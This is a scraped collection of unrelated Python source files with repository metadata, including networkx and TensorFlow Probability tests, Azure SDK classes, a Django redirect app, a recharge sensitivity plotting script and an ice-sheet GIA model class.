677993bbfd1033c8a7be8606b387754616bdceda | 853d4cec42071b76a80be38c58ffe0fbf9b9dc34 | /venv/Lib/site-packages/networkx/algorithms/isomorphism/tests/test_tree_isomorphism.py | 3082365a4bb61f2d8c99fcddb56c72e2af1d0aeb | [] | no_license | msainTesting/TwitterAnalysis | 5e1646dbf40badf887a86e125ef30a9edaa622a4 | b1204346508ba3e3922a52380ead5a8f7079726b | refs/heads/main | 2023-08-28T08:29:28.924620 | 2021-11-04T12:36:30 | 2021-11-04T12:36:30 | 424,242,582 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,443 | py |
import networkx as nx
import random
import time
from networkx.classes.function import is_directed
from networkx.algorithms.isomorphism.tree_isomorphism import (
rooted_tree_isomorphism,
tree_isomorphism,
)
# have this work for graph
# given two trees (either the directed or undirected)
# transform t2 according to the isomorphism
# and confirm it is identical to t1
# randomize the order of the edges when constructing
def check_isomorphism(t1, t2, isomorphism):
# get the name of t1, given the name in t2
mapping = {v2: v1 for (v1, v2) in isomorphism}
# these should be the same
d1 = is_directed(t1)
d2 = is_directed(t2)
assert d1 == d2
edges_1 = []
for (u, v) in t1.edges():
if d1:
edges_1.append((u, v))
else:
# if not directed, then need to
# put the edge in a consistent direction
if u < v:
edges_1.append((u, v))
else:
edges_1.append((v, u))
edges_2 = []
for (u, v) in t2.edges():
# translate to names for t1
u = mapping[u]
v = mapping[v]
if d2:
edges_2.append((u, v))
else:
if u < v:
edges_2.append((u, v))
else:
edges_2.append((v, u))
return sorted(edges_1) == sorted(edges_2)
def test_hardcoded():
print("hardcoded test")
# define a test problem
edges_1 = [
("a", "b"),
("a", "c"),
("a", "d"),
("b", "e"),
("b", "f"),
("e", "j"),
("e", "k"),
("c", "g"),
("c", "h"),
("g", "m"),
("d", "i"),
("f", "l"),
]
edges_2 = [
("v", "y"),
("v", "z"),
("u", "x"),
("q", "u"),
("q", "v"),
("p", "t"),
("n", "p"),
("n", "q"),
("n", "o"),
("o", "r"),
("o", "s"),
("s", "w"),
]
# there are two possible correct isomorphisms
# it currently returns isomorphism1
# but the second is also correct
isomorphism1 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "y"),
("k", "z"),
("l", "x"),
("m", "w"),
]
# could swap y and z
isomorphism2 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "z"),
("k", "y"),
("l", "x"),
("m", "w"),
]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.Graph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# try again as digraph
t1 = nx.DiGraph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.DiGraph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# randomly swap a tuple (a,b)
def random_swap(t):
(a, b) = t
if random.randint(0, 1) == 1:
return (a, b)
else:
return (b, a)
# given a tree t1, create a new tree t2
# that is isomorphic to t1, with a known isomorphism
# and test that our algorithm found the right one
def positive_single_tree(t1):
assert nx.is_tree(t1)
nodes1 = [n for n in t1.nodes()]
# get a random permutation of this
nodes2 = nodes1.copy()
random.shuffle(nodes2)
# this is one isomorphism, however they may be multiple
# so we don't necessarily get this one back
someisomorphism = [(u, v) for (u, v) in zip(nodes1, nodes2)]
# map from old to new
map1to2 = {u: v for (u, v) in someisomorphism}
# get the edges with the transformed names
edges2 = [random_swap((map1to2[u], map1to2[v])) for (u, v) in t1.edges()]
# randomly permute, to ensure we're not relying on edge order somehow
random.shuffle(edges2)
# so t2 is isomorphic to t1
t2 = nx.Graph()
t2.add_edges_from(edges2)
# lets call our code to see if t1 and t2 are isomorphic
isomorphism = tree_isomorphism(t1, t2)
# make sure we got a correct solution
# although not necessarily someisomorphism
assert len(isomorphism) > 0
assert check_isomorphism(t1, t2, isomorphism)
# run positive_single_tree over all the
# non-isomorphic trees for k from 4 to maxk
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 13 takes about 2.86 seconds to run on my laptop
# larger values slow down significantly
# as the number of trees grows rapidly
def test_positive(maxk=14):
print("positive test")
for k in range(2, maxk + 1):
start_time = time.time()
trial = 0
for t in nx.nonisomorphic_trees(k):
positive_single_tree(t)
trial += 1
print(k, trial, time.time() - start_time)
# test the trivial case of a single node in each tree
# note that nonisomorphic_trees doesn't work for k = 1
def test_trivial():
print("trivial test")
# back to an undirected graph
t1 = nx.Graph()
t1.add_node("a")
root1 = "a"
t2 = nx.Graph()
t2.add_node("n")
root2 = "n"
isomorphism = rooted_tree_isomorphism(t1, root1, t2, root2)
assert isomorphism == [("a", "n")]
assert check_isomorphism(t1, t2, isomorphism)
# test another trivial case where the two graphs have
# different numbers of nodes
def test_trivial_2():
print("trivial test 2")
edges_1 = [("a", "b"), ("a", "c")]
edges_2 = [("v", "y")]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
t2 = nx.Graph()
t2.add_edges_from(edges_2)
isomorphism = tree_isomorphism(t1, t2)
# they cannot be isomorphic,
# since they have different numbers of nodes
assert isomorphism == []
# the function nonisomorphic_trees generates all the non-isomorphic
# trees of a given size. Take each pair of these and verify that
# they are not isomorphic
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 11 takes about 4.76 seconds to run on my laptop
# larger values slow down significantly
# as the number of trees grows rapidly
def test_negative(maxk=11):
print("negative test")
for k in range(4, maxk + 1):
test_trees = list(nx.nonisomorphic_trees(k))
start_time = time.time()
trial = 0
for i in range(len(test_trees) - 1):
for j in range(i + 1, len(test_trees)):
trial += 1
assert tree_isomorphism(test_trees[i], test_trees[j]) == []
print(k, trial, time.time() - start_time)
|
[
"[email protected]"
] | |
a3c03bb30d7ab9d2444696500ece8c13bfd13edd
|
2fabea234735beefc980b77b213fcb0dfb394980
|
/tensorflow_probability/python/math/sparse_test.py
|
aca018215524f5574b3df657c781c4d51d85533d
|
[
"Apache-2.0"
] |
permissive
|
tarrou/probability
|
0eee452b525a6e6b3c7c98d467468e47f07e861b
|
d4d80a1c04ad0b3e98758ebc3f7f82887274384d
|
refs/heads/master
| 2020-08-08T11:16:42.441268 | 2019-12-06T17:35:17 | 2019-12-06T17:35:17 | 213,819,828 | 0 | 0 |
Apache-2.0
| 2019-10-09T04:20:19 | 2019-10-09T04:20:19 | null |
UTF-8
|
Python
| false | false | 6,549 |
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sparse ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
def _assert_sparse_tensor_value(test_case_instance, expected, actual):
test_case_instance.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case_instance.assertAllEqual(expected.indices, actual.indices)
test_case_instance.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case_instance.assertAllEqual(expected.values, actual.values)
test_case_instance.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case_instance.assertAllEqual(expected.dense_shape, actual.dense_shape)
@test_util.run_all_in_graph_and_eager_modes
class SparseTest(test_case.TestCase):
# Copied (with modifications) from:
# tensorflow/contrib/layers/python/ops/sparse_ops.py.
def test_dense_to_sparse_1d(self):
st = tfp.math.dense_to_sparse([1, 0, 2, 0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.int32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([1, 2], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_float(self):
st = tfp.math.dense_to_sparse([1.5, 0.0, 2.3, 0.0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.float32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllClose([1.5, 2.3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_bool(self):
st = tfp.math.dense_to_sparse([True, False, True, False])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.bool)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([True, True], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str(self):
st = tfp.math.dense_to_sparse([b'qwe', b'', b'ewq', b''])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([b'qwe', b'ewq'], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str_special_ignore(self):
st = tfp.math.dense_to_sparse(
[b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[1], [2], [3]], result.indices)
self.assertAllEqual([b'', b'ewq', b''], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_2d(self):
st = tfp.math.dense_to_sparse([[1, 2, 0, 0], [3, 4, 5, 0]])
result = self.evaluate(st)
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
def test_dense_to_sparse_3d(self):
st = tfp.math.dense_to_sparse(
[[[1, 2, 0, 0],
[3, 4, 5, 0]],
[[7, 8, 0, 0],
[9, 0, 0, 0]]])
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_1d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([0, 100, 0, 3], np.int32), shape=[None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual([[1], [3]], result.indices)
self.assertAllEqual([100, 3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_unknown_3d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([[[1, 2, 0, 0], [3, 4, 5, 0]], [[7, 8, 0, 0], [9, 0, 0, 0]]],
np.int32),
shape=[None, None, None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_rank(self):
ph = tf1.placeholder_with_default(
np.array([[1, 2, 0, 0], [3, 4, 5, 0]], np.int32), shape=None)
st = tfp.math.dense_to_sparse(ph)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0],
[0, 1],
[1, 0],
[1, 1],
[1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
if __name__ == '__main__':
tf.test.main()
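# summary (editor's aside, inferred from the cases above): dense_to_sparse
# keeps the entries that differ from ignore_value -- by default 0 for
# numbers, b'' for strings and False for booleans -- and always returns
# int64 indices and dense_shape.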
|
[
"[email protected]"
] | |
f37f65c77fc2cbe630313fe9779572d9243628eb
|
96aa2367affe0dff353e1aaac8713ded087c5f68
|
/utils/spiderPlot_SA.py
|
335ed09082b623795670281ed3731ae77c81e7d3
|
[
"Apache-2.0"
] |
permissive
|
NMTHydro/Recharge
|
0fcca9a72b631d6c3834c62b84dfb096da6cb210
|
bbc1a05add92064acffeffb19f04e370b99a7918
|
refs/heads/develop
| 2020-05-21T17:39:37.702622 | 2020-04-08T17:10:40 | 2020-04-08T17:10:40 | 60,631,952 | 8 | 1 | null | 2016-10-26T17:01:21 | 2016-06-07T17:13:30 |
Python
|
UTF-8
|
Python
| false | false | 5,333 |
py
|
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from numpy import linspace, array, add, multiply, set_printoptions
from pandas import read_pickle, set_option, options
def round_to_value(number, roundto):
return round(number / roundto) * roundto
rc('mathtext', default='regular')
set_option('display.max_rows', None)
set_option('display.max_columns', None)
set_option('display.width', None)
set_option('display.precision', 3)
options.display.float_format = '${:,.2f}'.format
set_printoptions(threshold=3000, edgeitems=5000, precision=3)
set_option('display.height', None)
set_option('display.max_rows', None)
TEMPS = range(-5, 6)
ALL_PCT = [x * 0.1 for x in range(5, 16)]
ndvi_range = linspace(0.9, 1.7, 11)
NDVI_RANGE = array([round_to_value(x, 0.05) for x in ndvi_range])
def make_spider_plot(dataframe, ndvi, all_pct, temps, fig_path=None, show=False):
display_pct = [(int(x)) for x in add(multiply(all_pct, 100.0), -100)]
dfs = os.listdir(dataframe)
print 'pickled dfs: {}'.format(dfs)
filename = '_basic_sensitivity_2.pkl'
if filename in dfs:
df = read_pickle(os.path.join(dataframe, filename))
df.to_csv(os.path.join(fig_path, 'sample_df_basic_2.csv'))
print df
xx = 1
for index, row in df.iterrows():
fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
print 'shape temps: {}, shape row[0]: {}'.format(len(temps), len(row[0]))
ax2.plot(temps, row[0], 'black', label='Temperature (+/- 5 deg C)', marker='8')
ax1.plot(display_pct, row[1], 'blue', label='Precipitation (+/- 50%)', marker='8')
ax1.plot(display_pct, row[2], 'purple', label='Reference Evapotranspiration (+/- 50%)', marker='8')
ax1.plot(display_pct, row[3], 'brown', label='Total Available Water (+/- 50%)', marker='8')
        ax3.plot(ndvi, row[4], 'green', linestyle='-.', label='Normalized Difference Vegetation\n'
                                                              ' Index Conversion Factor (0.9 - 1.7)', marker='8')
ax1.plot(display_pct, row[5], 'red', label='Soil Hydraulic Conductivity (+/- 50%)', marker='8')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge in 14-Year Simulation (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("top")
ax3.xaxis.set_label_position("top")
# ax3.spines["top"].set_position(("axes", 1.0))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['top'].set_visible(True)
        plt.title('Variation of ETRM Physical Parameters at {}'.format(str(index).replace('_', ' ')),
y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
if show:
plt.show()
# if fig_path:
# plt.savefig(os.path.join(fig_path, '{}_spider'.format(index)), dpi=600, ext='jpg', close=True,
# verbose=True)
plt.close(fig)
if __name__ == '__main__':
root = os.path.join('F:\\', 'ETRM_Inputs')
sensitivity = os.path.join(root, 'sensitivity_analysis')
pickles = os.path.join(sensitivity, 'pickled')
figure_save_path = os.path.join(sensitivity, 'figures')
make_spider_plot(pickles, NDVI_RANGE, ALL_PCT, TEMPS, figure_save_path, show=True)
# ========================== EOF ==============================================
|
[
"[email protected]"
] | |
516e00001cc17c4e8ab48673154d9f69351bbfe1
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_run_request.py
|
2f2ed7a707c8b543f090be7f386215b7b75e10ce
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 |
MIT
| 2020-10-02T01:17:02 | 2019-05-22T07:33:46 |
Python
|
UTF-8
|
Python
| false | false | 1,824 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .run_request import RunRequest
class TaskRunRequest(RunRequest):
"""The parameters for a task run request.
All required parameters must be populated in order to send to Azure.
:param is_archive_enabled: The value that indicates whether archiving is
enabled for the run or not. Default value: False .
:type is_archive_enabled: bool
:param type: Required. Constant filled by server.
:type type: str
:param task_name: Required. The name of task against which run has to be
queued.
:type task_name: str
:param values: The collection of overridable values that can be passed
when running a task.
:type values:
list[~azure.mgmt.containerregistry.v2018_09_01.models.SetValue]
"""
_validation = {
'type': {'required': True},
'task_name': {'required': True},
}
_attribute_map = {
'is_archive_enabled': {'key': 'isArchiveEnabled', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'task_name': {'key': 'taskName', 'type': 'str'},
'values': {'key': 'values', 'type': '[SetValue]'},
}
def __init__(self, **kwargs):
super(TaskRunRequest, self).__init__(**kwargs)
self.task_name = kwargs.get('task_name', None)
self.values = kwargs.get('values', None)
self.type = 'TaskRunRequest'
|
[
"[email protected]"
] | |
1b5849466318aa075976375e01fa22fddd690edc
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_network_interface_load_balancers_operations.py
|
e42bd6eccf89e6b11dbf117b8ae8f3bcc1bcf2ca
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 |
MIT
| 2020-06-16T16:38:15 | 2019-08-30T21:08:55 |
Python
|
UTF-8
|
Python
| false | false | 5,600 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceLoadBalancersOperations(object):
"""NetworkInterfaceLoadBalancersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceLoadBalancerListResult"]
"""List all load balancers in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceLoadBalancerListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.NetworkInterfaceLoadBalancerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceLoadBalancerListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceLoadBalancerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/loadBalancers'} # type: ignore
|
[
"[email protected]"
] | |
9070f9ba6596fb792ae2d17601a5a9c0581820c3
|
fd8405ac0a5d062907c153f2f2e3569571366539
|
/irbisbooks/core/urls.py
|
17e44ae4a60722f69bb0d5da5d79b7b2b8dec070
|
[] |
no_license
|
ri-gilfanov/irbis-books
|
aab471833035ae51088bccfb0806b863aaba3468
|
0b2a32013ab7f0c0d167e0864a7cb858e8e75add
|
refs/heads/master
| 2021-01-25T13:19:07.818513 | 2018-03-02T09:47:06 | 2018-03-02T09:47:06 | 121,642,933 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 191 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.book_search, name='book_search'),
path('book_download/', views.book_download, name='book_download'),
]
|
[
"[email protected]"
] | |
42d0987e6e1898a0e5f60a297e7db42a013fab6d
|
bcf332d2f6ef6970cfaa480400a112ecee3f16b8
|
/stage07-artist2/s1level42.py
|
c5f34c2ae0814db387a0d43027c8ee7cd714f9b1
|
[
"Unlicense"
] |
permissive
|
skilstak/code-dot-org-python
|
e1907d29f3727060e5064a5eefd68a0f9f4f5c70
|
ba127124386ecfdc20bd84592b3c271f8205d748
|
refs/heads/master
| 2020-04-04T19:34:23.531210 | 2015-07-10T12:39:19 | 2015-07-10T12:39:19 | 26,862,410 | 7 | 4 | null | 2014-11-21T20:28:20 | 2014-11-19T13:24:30 |
Python
|
UTF-8
|
Python
| false | false | 465 |
py
|
"""Stage 7: Puzzle 8 of 11
Here's the solution to the previous puzzle. Can you add just 2 more
lines of code to complete the drawing?
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level42')
artist.speed = 'faster'
a = artist
for count2 in range(10):
artist.color = artist.random_color()
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
|
[
"[email protected]"
] | |
950b22a78a928e4427896cec1ba0d7c4cac4e011
|
6a4bfff7fcd78a0057401652c7f80d9a95a67267
|
/painless_redirects/tests/test_models.py
|
2f5b98013047caa595a23ef12657abfbbafe3877
|
[
"MIT"
] |
permissive
|
benzkji/django-painless-redirects
|
25987ff984830be7e45b4d0af9a9cd0046beabe7
|
153721486b214ddd5365b6ac5769129562254dd5
|
refs/heads/master
| 2023-05-24T14:23:53.783400 | 2020-06-22T10:35:29 | 2020-06-22T10:35:29 | 22,944,463 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 558 |
py
|
"""Tests for the models of the painless_redirects app."""
from django.test import TestCase
from . import factories
class RedirectModelTestCase(TestCase):
def test_model(self):
obj = factories.RedirectFactory()
self.assertTrue(obj.pk)
def test_redirect_value(self):
obj = factories.RedirectFactory()
self.assertEqual(obj.redirect_value('http'), "/the-new-path/")
obj.new_site = factories.SiteFactory()
self.assertEqual(obj.redirect_value('https'), "https://%s/the-new-path/" % obj.new_site.domain)
|
[
"[email protected]"
] | |
9f99434b0414a1ef779501b64fddd6cde711ca08
|
93022749a35320a0c5d6dad4db476b1e1795e318
|
/issm/giaivins.py
|
8b3e6e1be28e45ec640be9f57bc01bb251bc69f2
|
[
"BSD-3-Clause"
] |
permissive
|
pf4d/issm_python
|
78cd88e9ef525bc74e040c1484aaf02e46c97a5b
|
6bf36016cb0c55aee9bf3f7cf59694cc5ce77091
|
refs/heads/master
| 2022-01-17T16:20:20.257966 | 2019-07-10T17:46:31 | 2019-07-10T17:46:31 | 105,887,661 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,277 |
py
|
from issm.fielddisplay import fielddisplay
from issm.project3d import project3d
from issm.checkfield import checkfield
from issm.WriteData import WriteData
class giaivins(object):
"""
GIA class definition
Usage:
giaivins=giaivins();
"""
def __init__(self): # {{{
self.mantle_viscosity = float('NaN');
self.lithosphere_thickness = float('NaN');
self.cross_section_shape = 0;
#set defaults
self.setdefaultparameters()
#}}}
def __repr__(self): # {{{
string=' giaivins solution parameters:'
string="%s\n%s"%(string,fielddisplay(self,'mantle_viscosity','mantle viscosity constraints (NaN means no constraint) (Pa s)'))
string="%s\n%s"%(string,fielddisplay(self,'lithosphere_thickness','lithosphere thickness constraints (NaN means no constraint) (m)'))
string="%s\n%s"%(string,fielddisplay(self,'cross_section_shape',"1: square-edged, 2: elliptical-edged surface"))
return string
#}}}
def extrude(self,md): # {{{
self.mantle_viscosity=project3d(md,'vector',self.mantle_viscosity,'type','node')
self.lithosphere_thickness=project3d(md,'vector',self.lithosphere_thickness,'type','node')
return self
#}}}
def setdefaultparameters(self): # {{{
self.cross_section_shape=1;
return self
#}}}
def checkconsistency(self,md,solution,analyses): # {{{
# Early return
if ('GiaAnalysis' not in analyses):
return md
md = checkfield(md,'fieldname','gia.mantle_viscosity','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.lithosphere_thickness','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.cross_section_shape','numel',[1],'values',[1,2])
#be sure that if we are running a masstransport ice flow model coupled with giaivins, that thickness forcings
#are not provided into the future.
return md
# }}}
def marshall(self,prefix,md,fid): # {{{
WriteData(fid,prefix,'object',self,'fieldname','mantle_viscosity','format','DoubleMat','mattype',1);
WriteData(fid,prefix,'object',self,'fieldname','lithosphere_thickness','format','DoubleMat','mattype',1,'scale',10.**3.);
WriteData(fid,prefix,'object',self,'fieldname','cross_section_shape','format','Integer');
# }}}
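# usage sketch (editor's aside, based on the docstring and checkconsistency
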